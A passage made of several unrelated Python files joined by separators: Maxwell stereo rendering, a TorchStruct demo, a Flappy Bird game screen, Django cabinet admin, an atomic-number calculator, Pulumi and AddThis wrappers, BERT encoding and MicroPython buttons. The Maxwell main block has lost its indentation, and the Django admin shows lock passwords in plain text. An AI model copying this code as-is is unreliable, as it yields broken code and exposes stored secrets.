    ok = scene.writeMXS(centerFilename)
    if ok == 0:
        print('There was an error saving: ' + centerFilename)
        return 0
    # --------------------------------------------------------
    # Save the Left Camera
    # Switch the lens shader camera view to left
    cameraType = 1
    lensParams.setUInt('Type', cameraType)
    activeCameraType = lensParams.getUInt('Type')[0]
    leftFilename = scenePathNoExt + '_L.mxs'
    print('[Left MXS Scene] ' + os.path.basename(leftFilename) + ' [Lens] ' + 'LatLong Stereo' + ' [Camera View] ' + str(activeCameraType) + ' [Resolution 2:1 Ratio] ' + str(outputWidth) + 'x' + str(outputHeight) + ' [Parallax Distance CM] ' + str(activeParallaxDistance) + ' [Separation CM] ' + str(activeCameraSeparation))
    ok = scene.writeMXS(leftFilename)
    if ok == 0:
        print('There was an error saving: ' + leftFilename)
        return 0
    # --------------------------------------------------------
    # Save the Right Camera
    # Switch the lens shader camera view to right
    cameraType = 2
    lensParams.setUInt('Type', cameraType)
    activeCameraType = lensParams.getUInt('Type')[0]
    rightFilename = scenePathNoExt + '_R.mxs'
    print('[Right MXS Scene] ' + os.path.basename(rightFilename) + ' [Lens] ' + 'LatLong Stereo' + ' [Camera View] ' + str(activeCameraType) + ' [Resolution 2:1 Ratio] ' + str(outputWidth) + 'x' + str(outputHeight) + ' [Parallax Distance CM] ' + str(activeParallaxDistance) + ' [Separation CM] ' + str(activeCameraSeparation))
    ok = scene.writeMXS(rightFilename)
    if ok == 0:
        print('There was an error saving: ' + rightFilename)
        return 0
    print('\n--------------------------------------')
    print('Automagic Scene Setup Complete')
    return 1
# Render the stereo project files
# Example: aml_renderStereo('C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/CubeX.mxs', 0, 1, 1)
def _aml_renderView(sceneFilename, imageFilename, viewLabel):
    """Render one view's MXS file via runMaxwell, or report it missing."""
    if os.path.exists(sceneFilename):
        print('Rendering the ' + viewLabel + ' Camera View')
        parameters = []
        parameters.append('-mxs:' + sceneFilename)
        parameters.append('-display')
        parameters.append('-o:' + imageFilename)
        parameters.append('-p:low')
        print('[Parameters] ' + str(parameters))
        runMaxwell(parameters)
    else:
        # BUGFIX: the left/right branches previously printed the *center*
        # filename in this message; each view now reports its own file.
        print('[' + viewLabel + ' View MXS file not found] ' + sceneFilename)


# Render the stereo project files
# Example: aml_renderStereo('C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/CubeX.mxs', 0, 1, 1, 'png')
def aml_renderStereo(mxsFilePath, centerView, leftView, rightView, imageExtension):
    """Render the _C/_L/_R scenes written by aml_automagicStereo.

    centerView/leftView/rightView are 1 to render that view, 0 to skip it.
    imageExtension is the output image extension without the dot (e.g. 'png').
    """
    # Derive the per-view scene and image names from the original scene path.
    scenePathNoExt = os.path.splitext(mxsFilePath)[0]
    views = (
        (centerView, '_C', 'Center'),
        (leftView, '_L', 'Left'),
        (rightView, '_R', 'Right'),
    )
    print('\n--------------------------------------')
    print('LatLong Stereo Rendering')
    for enabled, suffix, viewLabel in views:
        if enabled == 1:
            _aml_renderView(scenePathNoExt + suffix + '.mxs',
                            scenePathNoExt + suffix + '.' + imageExtension,
                            viewLabel)
    print('--------------------------------------')
    print('The Automagic rendering stage is complete!')
# This code is the "main" section that is run automatically when the python script is loaded in pyMaxwell:
if __name__ == "__main__":
# Choose a Maxwell MXS scene file to process:
#mxsFilePath = '/Applications/Maxwell 3/scripts/stereo/CubeX.mxs'
mxsFilePath = 'C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/CubeX.mxs'
#mxsFilePath = '/opt/maxwell-3.2/scripts/stereo/CubeX.mxs'
#mxsFilePath = '/home/andrew/maxwell-3.2/scripts/stereo/CubeX.mxs'
# Choose a LatLong Stereo Separation Texture Map:
#separationTexturePath = '/Applications/Maxwell 3/scripts/stereo/textures/separation_map.png'
separationTexturePath = 'C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/textures/separation_map.png'
#separationTexturePath = '/opt/maxwell-3.2/scripts/stereo/textures/separation_map.png'
#separationTexturePath = '/home/andrew/maxwell-3.2/scripts/stereo/textures/separation_map.png'
# Choose a stereo depth ratio.
# ----------------------------------------
# This is a value like (1/100) or (1.0/55.0) which will be used to calculate a comfortable camera separation value. The camera's current focus distance is applied as the parallax distance value using the following math:
# Example: camera separation (in cm) = parallax distance (in cm) * stereoDepthStrength
# Example: 6.5 = 360 * (1/55)
# Use a strong stereo depth ratio
#stereoDepthStrength = (1.0/30.0)
# Use a medium stereo depth ratio
stereoDepthStrength = (1.0/55.0)
# Use a standard stereo depth ratio
#stereoDepthStrength = (1.0/100.0)
# Use a gentle stereo depth ratio
#stereoDepthStrength = (1.0/120.0)
# Camera Views to Render
# ----------------------------------
# Set each of the views to 1 to render, and 0 to skip rendering
leftView = 1
rightView = 1
centerView = 0
# Launch the automagic stereo camera set up command
if os.path.exists(mxsFilePath):
# Generate the stereo project files
ok = aml_automagicStereo(mxsFilePath, separationTexturePath, stereoDepthStrength)
if ok == 1:
# Render the stereo project files
aml_renderStereo(mxsFilePath, centerView, leftView, rightView, 'png')
else:
print('[MXS File Not Found] ' + mxsFilePath)
|
#!/usr/bin/env python3
import numpy as np
import torch
from itypes import TorchStruct
# Demo/smoke-test script for itypes.TorchStruct: builds a nested struct of
# GPU tensors and exercises its conversion and batching helpers.
device = torch.device('cuda:0')
print()

# Build a nested TorchStruct of "hwc" (presumably height/width/channel —
# confirm against itypes docs) tensors, with NaN/Inf entries so that
# nan_to_num below has something to replace.
s = TorchStruct(dims="hwc")
s.x = torch.tensor([[[1, 2, 3], [4, np.nan, np.inf]]], device=device)
s.y = TorchStruct(dims="hwc")
s.y.z = torch.tensor([[7, 8, 9], [10, np.nan, np.inf]], device=device)
print("s:")
print(s)
print('s.x:')
print(s.x)
print('s.y.z:')
print(s.y.z)
print()
print('nan_to_num result:')
# NOTE: s is unchanged
q = s.nan_to_num()
print("q:")
print(q)
print('q.x:')
print(q.x)
print('q.y.z:')
print(q.y.z)
print()
# Dimension-layout conversions; each returns a new struct.
print("to_hwc result:")
# NOTE: s is unchanged
q = s.to_hwc()
print("q:")
print(q)
print()
print("to_chw result:")
# NOTE: s is unchanged
q = s.to_chw()
print("q:")
print(q)
print()
print("to_bhwc result:")
# NOTE: s is unchanged
q = s.to_bhwc()
print("q:")
print(q)
print()
print("to_bchw result:")
# NOTE: s is unchanged
q = s.to_bchw()
print("q:")
print(q)
print()
# Batch operations: non-tensor members (int, list) ride along.
s = s.to_bchw()
s.int_value = 2
s.list = [2, 3]
q = s.concat_batch([s, s])
print("after concat batch:")
print(q)
print()
print('after modify:')
q.int_value[0] = 5
q.float_value = 2.3
print(q)
print()
a, b = q.split_batch()
print('split_batch first entry:')
print(a)
print('split_batch second entry:')
print(b)
print()
# Device / backend round-trips: CUDA -> CPU -> numpy -> CUDA -> clone.
print('to cpu:')
q = s.to('cpu')
print("q:")
print(q)
print()
print('to numpy:')
q = s.to_numpy()
print("q:")
print(q)
print()
print('back to GPU:')
q = q.to(device)
print("q:")
print(q)
print()
print('after clone:')
q = q.clone()
print("q:")
print(q)
print()
|
import pygame as pg
import logging
from random import randint
from flappy.configs.configs import Configs
from flappy.controlador.pg_utils import carregar_sprites, som
from flappy.entidades.flappy import Flappy
from flappy.entidades.score import Score
from flappy.entidades.terreno import Terreno
from flappy.entidades.canos import Canos
from flappy.telas.game_over import GameOver
from flappy.telas.tela import TelaBase
class Jogo(TelaBase):
    """Main gameplay screen: background, bird, ground, two pipe pairs and score."""

    def __init__(self, tela_pg):
        TelaBase.__init__(self, tela_pg, proxima=GameOver)
        # TODO: count the files in the folder instead of loading everything
        fundos = carregar_sprites("bg")
        # Pick a random background from the ones available in the folder.
        indice_fundo_aleatorio = randint(0, len(fundos) - 1)
        self.bg = fundos[indice_fundo_aleatorio]
        self.flappy = Flappy(tela_pg)
        self.terreno = Terreno(tela_pg)
        self.canos1 = Canos(tela_pg)
        self.canos2 = Canos(tela_pg)
        # Offset the second pipe pair by half a screen width plus pipe width.
        self.canos2.rect.x += (Configs.TELA_LARGURA + self.canos2.imagem.get_width()) / 2
        self.score = Score(tela_pg)
        # self.sprites.append(self.bg)
        # self.sprites.append(self.terreno)
        # Space bar makes the bird jump.
        self.atalhos_teclado[pg.K_SPACE] = self.flappy.pular

    def desenhar(self):
        """Draw one frame and handle scoring and collision."""
        self.tela_pg.blit(self.bg, self.bg.get_rect())
        # TODO: draw score
        self.canos1.desenhar()
        self.canos2.desenhar()
        self.terreno.desenhar()
        self.flappy.desenhar()
        self.score.desenhar()
        # Passed a pipe: increment the score and play the sound effect.
        # NOTE(review): equality on rect.x assumes the pipes move in steps
        # that land exactly on the bird's x position — confirm.
        if self.flappy.rect.x in (self.canos1.rect.x, self.canos2.rect.x):
            som("point")
            self.score.incrementar_score()
        # TODO: death animation, game over screen
        objetos_colisao = [self.canos1, self.canos2, self.terreno]
        for objeto in objetos_colisao:
            if objeto.colisao(self.flappy):
                som("hit")
                logging.info(f"Flappy colidiu com '{objeto.__class__}'")
                # Freeze all movement and input, pause briefly, then
                # switch to the GameOver screen.
                self.canos1.movimentar = False
                self.canos2.movimentar = False
                self.flappy.movimentar = False
                self.atalhos_teclado = {}
                pg.time.wait(1000)
                self.proxima = GameOver
                self.finalizar()
                break
|
from django.contrib import admin
from . import models
@admin.register(models.Cabinet)
class CabinetAdmin(admin.ModelAdmin):
    """Admin change list for individual cabinets, filterable by branch."""
    list_display_links = ('cabinet_number', )
    search_fields = ('cabinet_number', )
    list_filter = ('cabinet_set__branch', )
    list_display = ('id', 'cabinet_number', 'cabinet_set', 'xpos', 'ypos',
                    'is_clean', 'user')
    list_per_page = 10
@admin.register(models.CabinetSet)
class CabinetSetAdmin(admin.ModelAdmin):
    """Admin for cabinet sets, filterable by branch name/number."""
    list_display_links = ('desc', )
    list_filter = (
        'branch__branch_name',
        'branch__branch_num',
    )
    list_display = (
        'desc',
        'branch',
    )
# @admin.register(models.UseCabinet)
# class UseCabinetAdmin(admin.ModelAdmin):
# list_display_links = ('cabinet', )
# search_fields = (
# 'user_name',
# 'user_username',
# )
# list_filter = ('cabinet__cabinet_set__branch', )
# list_display = (
# 'cabinet',
# 'user',
# 'start_date',
# 'end_date',
# 'is_usable',
# )
@admin.register(models.CabinetAction)
class CabinetActionAdmin(admin.ModelAdmin):
    """Admin for cabinet action labels (English and Korean wording)."""
    list_display_links = (
        'substance',
        'kr_substance',
    )
    list_display = (
        'substance',
        'kr_substance',
    )
@admin.register(models.CabinetHistory)
class CabinetHistoryAdmin(admin.ModelAdmin):
    """Admin for the per-cabinet usage history, searchable by user."""
    list_display_links = ('cabinet', )
    search_fields = (
        'user_name',
        'user_username',
    )
    list_filter = ('cabinet__cabinet_set__branch', )
    list_display = (
        'cabinet',
        'user',
        'start_date',
        'end_date',
        'cabinet_action',
    )
@admin.register(models.CabinetLock)
class CabinetLockAdmin(admin.ModelAdmin):
    """Admin for physical cabinet locks.

    NOTE(review): lock_password is rendered in plain text in the change
    list below — confirm this exposure is acceptable for admin users.
    """
    list_display_links = ('lock_number', )
    search_fields = (
        'lock_number',
        'cabinet__cabinet_number',
    )
    list_filter = ('branch', )
    list_display = (
        'branch',
        'cabinet',
        'lock_number',
        'lock_password',
    )
|
import numpy as np #https://numpy.org/
import chemparse #https://pypi.org/project/chemparse/
from mendeleev import element #https://github.com/lmmentel/mendeleev
# Program version and release date, shown in the banner and help text.
version = 0.12
date = "02/2022"
def printHelp():
    '''Print the help dialog listing usage, outputs and literature references.

    Fixed: the Hohn & Niedrig (1972) and Buechner (1973) entries were both
    mislabelled "Joyet (1954)" (copy-paste of the preceding line).
    '''
    print('================= Manuca Help =================')
    print('Usage: Enter a stoichiometric formula (e.g. H2O) and confirm with ENTER. Type "q" to quit. Enter "multi" to construct a multi-compound sample, see below.')
    print('The input is read with chemparse, which can handle complicated formulas with one level of parentheses, e.g. (Mg0.7Zn0.3)5H2(AsO4)4(H2O)10 (ICSD entry 267). ')
    print('Note: chemparse currently only handles non-nested paretheses. A formula with nested parentheses like "CH3(C2(CH3)2)3CH3" will not work properly. Please use the "multi" option instead to construct such a compound.')
    print('\nThe program will calculate and output various properties:')
    print(' "Chemical formula" -> The parsed formula read from the user input.')
    print(' "Composition table" -> Composition in atomic % (at.%) and weight % (wt.%).')
    print(' "Mean atomic number" -> Various forms of the mean atomic number as listed in Howell et al, Scanning 20 (1998):')
    print(' "Mueller (1954) -> Mueller, Phys. Rev. 93, 891 (1954).')
    print(' "Saldick & Allen (1954) --> Saldick and Allen, J Chem Phys 22 (1954).')
    print(' "Joyet (1954) -> Joyet et al, The Dosage of Gamma Radiation at Very High Energies. The Brown Boveri Betatron, (1954).')
    print(' "Hohn & Niedrig (1972) -> Hohn and Niedrig: Elektronrenrückstreuung an dünnen Metall-undIsolatorschichten. Optik 35 (1972)')
    print(' "Buechner (1973) -> Buechner, Bestimmung der mittleren Ordnungszahl vonLegierungen bei der quantitativen Mikrosondenanalyse, Arch Eisenhüttenwesen 44 (1973)')
    print(' "Everhart (1960) -> Everhart, Simple theory concerning the reflection of electrons from solids. J Appl Phys 31 (1960)')
    print(' "Other properties" -> Other compound properties which can be calculated from the stoichiometry.')
    print(' "Zeff (Egerton, EFTEM)" -> Eq. (5.4) from Egerton, Electron Energy-Loss Spectroscopy in the Electron Microscope, Springer (2011)')
    print(' "Aeff (Egerton, EFTEM)" -> Effective atomic mass for EFTEM.')
    print(' "Tot. at. mass" -> Total atomic/molecular mass in g/mol.')
    print(' "Avg. at. mass" -> Average atomic/molecular mass in g/mol.')
    print('\nUsing "multi" to construct multi-compound samples:')
    print(' (1) Type "multi" to start the dialog.')
    print(' (2) Enter the number of "sub-compounds" you want to mix (e.g. 3).')
    print(' (3) For each sub-compound, specify the stoichiometry and relative concentration. For the latter you can use any relative concentration numbers, as their sum will be used to normalize the concentrations. Example: Mixing 3 compounds with a relative ratio 20%, 30%, and 50% can be done with (2, 3, 5) as well as (20, 30, 50) as well as (40, 60, 100).')
    print('\nManuca is based on the following Python packages. Please cite them if you find use in Manuca.')
    print(' NumPy (https://numpy.org/), chemparse (https://pypi.org/project/chemparse/) , mendeleev (https://github.com/lmmentel/mendeleev)')
    print(f'Manuca version: {version}, {date}, Author: Lukas Gruenewald')
    print('==============================================')
def multi_compound(n_comp):
    '''Create multi-compound from n_comp compounds'''
    # Structured array: formula string plus its relative concentration.
    mc_in = np.zeros(n_comp, dtype=[('comp', 'U500'),('conc', 'f4')])
    # Collect the sub-compound formulas and relative concentrations.
    for idx in range(n_comp):
        print(f'Compound {idx+1} of {n_comp}.')
        formula = input('Enter stoichiometry: ')
        ratio = input('Enter relative concentration: ')
        mc_in[idx] = (formula, ratio)
    # Normalize the relative concentrations so they sum to one.
    mc_in['conc'] /= np.sum(mc_in['conc'])
    # Build the combined formula string, scaling each element count by
    # its compound's normalized concentration.
    combined = ''
    for idx, formula in enumerate(mc_in['comp']):
        counts = chemparse.parse_formula(formula)
        counts.update((el, np.round(cnt * mc_in['conc'][idx], 4)) for el, cnt in counts.items())
        for el, cnt in counts.items():
            combined += el + str(cnt)
    return combined
### Interactive CLI: read a formula (or command) and report mean-Z metrics ###
print(f'Manuca - Mean Atomic Number calculator (v{version})')
print('Enter "help" to show further information. Enter "q" to quit. Enter "multi" to construct a multi-compound sample.')
print(f'Manuca comes without any warranty for correctness. PLEASE double-check the outputs and if the input stoichiometry is read in correctly.')
while True:
    user_input = input("Enter stoichiometry: ")
    if(user_input == 'q'):
        break
    if(user_input == 'help'):
        printHelp()
        continue
    if(user_input == 'multi'):
        # Guard against a non-numeric count so a typo does not abort the session.
        try:
            n_comp = int(input("Enter number of compounds: "))
        except ValueError:
            print('Please enter an integer number of compounds.')
            continue
        multicompound = multi_compound(n_comp)
    # Dictionary from chemparse with values
    if(user_input == 'multi'):
        parse = multicompound
    else:
        parse = user_input
    ### Calculations
    d = chemparse.parse_formula(parse)
    e = list(d.keys()) #elements
    w = np.array(list(d.values())) #weights
    try:
        m = element(e) #Element properties from mendeleev
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit still propagate.
        print('At least one element could not be recognized. Please check stoichiometry and try again.')
        continue
    ### Atomic percentages
    n = np.sum(w)
    d_atp = {k: v / n for k, v in d.items()}
    ### Weight percentages
    aw = np.array([element.atomic_weight for element in m])
    n_weight = np.sum(w/n*aw)
    d_wtp = {k: v/n*aw[i]/n_weight for i, (k, v) in enumerate(d.items())}
    ### Mean atomic numbers
    decimals = 3
    Z = np.array([element.atomic_number for element in m])
    Wtpercents = np.fromiter(d_wtp.values(), dtype='float')
    Atpercents = np.fromiter(d_atp.values(), dtype='float')
    meanZ_Average = np.round(np.sum(w/n*Z), decimals) #Simple average based on atomic proportions
    meanZ_Mueller = np.round(np.sum(Z*Wtpercents), decimals) #Mueller 1954
    meanZ_SaldickAllen = np.round(np.sum(Atpercents*Z**2)/np.sum(Atpercents*Z), decimals) #Saldick and Allen 1954
    meanZ_Joyet = np.round(np.sqrt(np.sum(Atpercents*Z**2)), decimals) #Joyet 1953, Hohn und Niedrig 1972, Büchner 1973
    meanZ_Everhart = np.round(np.sum(Wtpercents*Z**2)/np.sum(Wtpercents*Z), decimals) #Everhart 1960, Joy 1995
    ### Effective atomic number
    Zeff_Egerton = np.round(np.sum(Atpercents*Z**1.3)/np.sum(Atpercents*Z**0.3), decimals) #effective Z, Egerton for EFTEM
    Aeff_Egerton = np.round(np.sum(Atpercents*aw**1.3)/np.sum(Atpercents*aw**0.3), decimals) #effective A, Egerton for EFTEM
    ### Atomic mass
    tot_atomic_mass = np.round(np.sum(w*aw), decimals)
    avg_atomic_mass = np.round(np.sum(w/n*aw), decimals)
    #Print results
    print('Chemical formula:')
    print(chemparse.parse_formula(parse))
    print('------------------------------')
    print('Element\t at.%\t','wt.%')
    for key, value in d_atp.items():
        print(key,'\t', np.round(value*100,2),'\t',np.round(d_wtp[key]*100,2))
    print('------------------------------')
    print('Mean atomic numbers:')
    print('------------------------------')
    print(f'Atomic-percent average:\t{meanZ_Average}')
    print(f'Mueller (1954):\t\t{meanZ_Mueller}')
    print(f'Saldick & Allen (1954):\t{meanZ_SaldickAllen}')
    print(f'Joyet (1953):\t\t{meanZ_Joyet}')
    print(f'Everhart (1960):\t{meanZ_Everhart}')
    print('------------------------------')
    print('Other properties:')
    print('------------------------------')
    print(f'Zeff (Egerton, EFTEM):\t{Zeff_Egerton}')
    print(f'Aeff (EFTEM, g/mol):\t{Aeff_Egerton}')
    print(f'Tot. A (g/mol):\t\t{tot_atomic_mass}')
    print(f'Avg. A (g/mol):\t\t{avg_atomic_mass}')
    print('==============================\n')
|
"""Definition of command codes used in communication with APNs."""
NOTIFICATION = 2
ERROR_RESPONSE = 8
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetPackageResult',
'AwaitableGetPackageResult',
'get_package',
'get_package_output',
]
@pulumi.output_type
class GetPackageResult:
    """Outputs returned by the ``aws-native:panorama:getPackage`` invoke.

    Generated wrapper; values are supplied by the Pulumi engine and
    exposed through the decorated getter properties below.
    """
    def __init__(__self__, arn=None, created_time=None, package_id=None, storage_location=None, tags=None):
        # Engine-populated values: validate types, then stash them where
        # @pulumi.output_type expects them (via pulumi.set).
        if arn and not isinstance(arn, str):
            raise TypeError("Expected argument 'arn' to be a str")
        pulumi.set(__self__, "arn", arn)
        if created_time and not isinstance(created_time, int):
            raise TypeError("Expected argument 'created_time' to be a int")
        pulumi.set(__self__, "created_time", created_time)
        if package_id and not isinstance(package_id, str):
            raise TypeError("Expected argument 'package_id' to be a str")
        pulumi.set(__self__, "package_id", package_id)
        if storage_location and not isinstance(storage_location, dict):
            raise TypeError("Expected argument 'storage_location' to be a dict")
        pulumi.set(__self__, "storage_location", storage_location)
        if tags and not isinstance(tags, list):
            raise TypeError("Expected argument 'tags' to be a list")
        pulumi.set(__self__, "tags", tags)
    @property
    @pulumi.getter
    def arn(self) -> Optional[str]:
        """Return the 'arn' output value."""
        return pulumi.get(self, "arn")
    @property
    @pulumi.getter(name="createdTime")
    def created_time(self) -> Optional[int]:
        """Return the 'created_time' output value."""
        return pulumi.get(self, "created_time")
    @property
    @pulumi.getter(name="packageId")
    def package_id(self) -> Optional[str]:
        """Return the 'package_id' output value."""
        return pulumi.get(self, "package_id")
    @property
    @pulumi.getter(name="storageLocation")
    def storage_location(self) -> Optional['outputs.PackageStorageLocation']:
        """Return the 'storage_location' output value."""
        return pulumi.get(self, "storage_location")
    @property
    @pulumi.getter
    def tags(self) -> Optional[Sequence['outputs.PackageTag']]:
        """Return the 'tags' output value."""
        return pulumi.get(self, "tags")
class AwaitableGetPackageResult(GetPackageResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        """Make the result awaitable; resolves immediately because the
        values are already present (the unreachable yield turns this
        into a generator, satisfying the await protocol)."""
        if False:
            yield self
        return GetPackageResult(
            arn=self.arn,
            created_time=self.created_time,
            package_id=self.package_id,
            storage_location=self.storage_location,
            tags=self.tags)
def get_package(package_id: Optional[str] = None,
                opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPackageResult:
    """
    Schema for Package CloudFormation Resource

    ``package_id``: id of the package to look up.
    ``opts``: optional invoke options; a default version is filled in
    from the SDK when the caller did not pin one.
    """
    # Only the package id is accepted as an invoke argument.
    __args__ = dict()
    __args__['packageId'] = package_id
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Synchronous invoke; .value is the plain result object.
    __ret__ = pulumi.runtime.invoke('aws-native:panorama:getPackage', __args__, opts=opts, typ=GetPackageResult).value
    return AwaitableGetPackageResult(
        arn=__ret__.arn,
        created_time=__ret__.created_time,
        package_id=__ret__.package_id,
        storage_location=__ret__.storage_location,
        tags=__ret__.tags)
@_utilities.lift_output_func(get_package)
def get_package_output(package_id: Optional[pulumi.Input[str]] = None,
                       opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetPackageResult]:
    """
    Schema for Package CloudFormation Resource
    """
    # Body intentionally empty: lift_output_func wraps get_package so it
    # accepts Inputs and returns an Output.
    ...
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import requests
from addthis.exceptions import AddthisError, AddthisValidationError
class Addthis(object):
    """Holds AddThis credentials and hands out ``AddthisEndpoint``
    objects via attribute access (e.g. ``addthis.shares`` starts an
    endpoint path rooted at ``"shares"``).
    """
    def __init__(self, userid, password, pubid=None):
        """Store the credentials used for every request.

        ``userid``: AddThis userid or e-mail address.
        ``password``: AddThis password.
        ``pubid``: optional publisher profile applied to all requests;
        may instead be supplied per request as a query parameter.
        """
        self.pubid = pubid
        self.userid = userid
        self.password = password
    def __getattr__(self, path):
        """Begin a new query path; the returned endpoint is callable."""
        return AddthisEndpoint(self.userid, self.password, self.pubid, path)
class AddthisEndpoint(object):
    """Accumulates a metric/dimension path via attribute access and runs
    the corresponding Addthis Analytics API query when called."""
    API_VERSION = 1.0
    BASE_URL = "https://api.addthis.com/analytics/{api_version}/pub/"\
        .format(api_version=API_VERSION)
    def __init__(self, userid, password, pubid, path=None):
        self.userid = userid
        self.password = password
        self.pubid = pubid
        # Path pieces collected so far; a full query needs exactly two.
        self.path = [path] if path else []
    def __getattr__(self, path):
        # Extend the path and keep chaining on the same object.
        self.path.append(path)
        return self
    def __call__(self, *args, **kwargs):
        """Validate that exactly two path pieces (metric, dimension)
        were collected, then execute the request with ``kwargs`` as
        query parameters."""
        if len(self.path) != 2:
            raise AddthisValidationError("Incorrect number of parameters "
                                         "are given. Expected 2 but got "
                                         "{num_params}."
                                         .format(num_params=len(self.path)))
        metric, dimension = self.path
        return self.request(metric, dimension, query_params=kwargs)
    def _make_request_url(self, metric, dimension):
        return f"{self.BASE_URL}{metric}/{dimension}.json"
    def _make_query_params(self, query_params):
        if query_params is None:
            query_params = {}
        # Fall back to the constructor-supplied pubid unless overridden.
        if self.pubid and "pubid" not in query_params:
            query_params["pubid"] = self.pubid
        return query_params
    def _make_request(self, url, query_params):
        credentials = (self.userid, self.password)
        return requests.get(url, params=query_params, auth=credentials)
    def request(self, metric, dimension, query_params=None):
        """Build the URL, execute the query, and return the decoded
        JSON.  Raises ``AddthisError`` carrying the service's error
        payload on any non-200 response."""
        url = self._make_request_url(metric, dimension)
        query_params = self._make_query_params(query_params)
        response = self._make_request(url, query_params)
        data = response.json()
        if response.status_code != 200:
            raise AddthisError(response.status_code, data["error"])
        return data
# Please run bert-serving-start before running this notebook
# Setup: https://github.com/hanxiao/bert-as-service
# Examples (change folders to your locals)
# english cased: bert-serving-start -model_dir /bert-as-service/cased_L-24_H-1024_A-16/ -num_worker=4
# multi cased: bert-serving-start -model_dir /bert-as-service/multi_cased_L-12_H-768_A-12/ -num_worker=4
# chinese: bert-serving-start -model_dir /bert-as-service/chinese_L-12_H-768_A-12/ -num_worker=4
# launch bert (valilenk):
# english cased: bert-serving-start -model_dir /media/airvetra/1tb/valilenk/nlp/bert-as-service/cased_L-24_H-1024_A-16/ -num_worker=2
# multi cased: bert-serving-start -model_dir /media/airvetra/1tb/valilenk/nlp/bert-as-service/multi_cased_L-12_H-768_A-12/ -num_worker=2
# chinese: bert-serving-start -model_dir /media/airvetra/1tb/valilenk/nlp/bert-as-service/chinese_L-12_H-768_A-12/ -num_worker=2
import pandas as pd
import torch
import os
from time import time
from tqdm import tqdm
from bert_serving.client import BertClient
# Resolve the sibling "data" folder and load the raw test split.
data_folder = os.path.dirname(os.getcwd()) + "/data"
test = pd.read_csv(data_folder + "/raw/test.csv")
# Client for the locally running bert-serving server (start it first;
# see the launch commands in the header comments).
bc = BertClient()
def gen_encodings(df, column):
    """Encode the text of ``df[column]`` with the bert-serving client.

    Returns a DataFrame with one column per embedding dimension, named
    ``"{column}_{i}"``, joined with the source frame's ``id`` column.
    """
    t0 = time()
    texts = list(df.loc[:, column])
    for i, text in enumerate(texts):
        # bc.encode() needs non-empty strings: coerce non-str values and
        # replace empty/whitespace-only entries with a placeholder.
        # (Replaces the original strip-then-recheck-length dance.)
        s = text if isinstance(text, str) else str(text)
        if not s.strip():
            s = "temp"
        texts[i] = s
    arr = bc.encode(texts)
    temp = pd.DataFrame(arr)
    temp.columns = [f"{column}_{c}" for c in range(len(arr[0]))]
    temp = temp.join(df.id)
    print(f"time: {time() - t0}")
    return temp
encoded_test = gen_encodings(test, "title1_en")
encoded_test.to_csv("encoded_test1.csv")
encoded_test = gen_encodings(test, "title2_en")
encoded_test.to_csv("encoded_test2.csv")
|
from machine import Pin, I2C
from neopixel import NeoPixel
from time import sleep, ticks_ms, ticks_diff
import framebuf
import gc
import sh1106
# Wemos pins - for our and our users' convenience
D0 = const(16)
D1 = const(5)
D2 = const(4)
D3 = const(0)
D4 = const(2)
D5 = const(14)
D6 = const(12)
D7 = const(13)
D8 = const(15)
# I2C and screen
i2c = I2C(scl=Pin(D1), sda=Pin(D2), freq=400000) # I2C object on pins D1 and D2
lcd = sh1106.SH1106_I2C(128, 64, i2c, None, 0x3c, rotate=180) # SH1106 display on I2C 0x3C, rotated
# screen init
lcd.sleep(False) # Turn on the display
lcd.fill(0) # Erase display
# Neopixel
numPixels = 1 # How many pixels are attached to the nugget? If just the built in display, put 1
pin = Pin(D8, Pin.OUT) # set GPIO15 to output to drive NeoPixels
def get_neopixels(count):
    """Return a NeoPixel driver on pin D8 driving ``count`` pixels."""
    return NeoPixel(pin, count) # create NeoPixel driver on GPIO15 for all neopixels
# Button pins (inputs with pull-ups, so a pressed button reads low)
down_p = Pin(D3, Pin.IN, Pin.PULL_UP) # down is green
up_p = Pin(D6, Pin.IN, Pin.PULL_UP) # up is red
left_p = Pin(D7, Pin.IN, Pin.PULL_UP) # left is blue
right_p = Pin(D5, Pin.IN, Pin.PULL_UP) # right is yellow
# Button wrapper code for usability
class Buttons():
    """Debounced wrapper around a dict of active-low button pins.

    ``buttons`` maps a name to an input Pin (pulled up, pressed == low).
    ``callbacks`` optionally maps a name to a zero-argument callable
    fired once per press.  ``aliases`` maps alternative names (e.g.
    colors) to button names for attribute access.
    """
    debounce_time = 150 # milliseconds a button must stay released
    def __init__(self, buttons, callbacks=None, aliases=None):
        self.b = buttons
        # None-sentinels instead of mutable default arguments, which
        # would be shared across instances.
        self.cb = callbacks if callbacks is not None else {}
        self.b_al = aliases if aliases is not None else {}
        self.values = {name:False for name in buttons}
        self.debounce = {name:0 for name in buttons}
    def update(self):
        """Poll every pin and update logical button states.

        Presses are accepted immediately (and fire callbacks); releases
        are debounced so contact bounce does not register as a release.
        """
        for name, button in self.b.items():
            new = not button.value() # inverting the pin here (active low)
            old = self.values[name]
            if new and not old:
                # button just pressed, recording that
                self.values[name] = True
                # clearing debounce timer if it's set - we only debounce on release
                self.debounce[name] = None
                # executing the button callback if available
                cb = self.cb.get(name, None)
                if callable(cb):
                    cb()
            elif old and not new:
                # button is released; only releases are debounced so
                # that presses are processed as quickly as possible
                if not self.debounce[name]:
                    # starting debounce timer
                    self.debounce[name] = ticks_ms()
                else:
                    if ticks_diff(ticks_ms(), self.debounce[name]) > self.debounce_time:
                        # button has been de-pressed for long enough
                        self.values[name] = False
            elif new:
                # button still pressed - cancel any timer started by a
                # bit of bounce on press
                self.debounce[name] = None
            else:
                pass # button long-released
    def __getattr__(self, attr):
        # lets you get button value by direction - like `buttons.left`
        if attr in self.b:
            return self.values[attr]
        # lets you get button value by color alias - like `buttons.blue`
        elif attr in self.b_al:
            return self.values[self.b_al[attr]]
        # Previously fell through and silently returned None, which
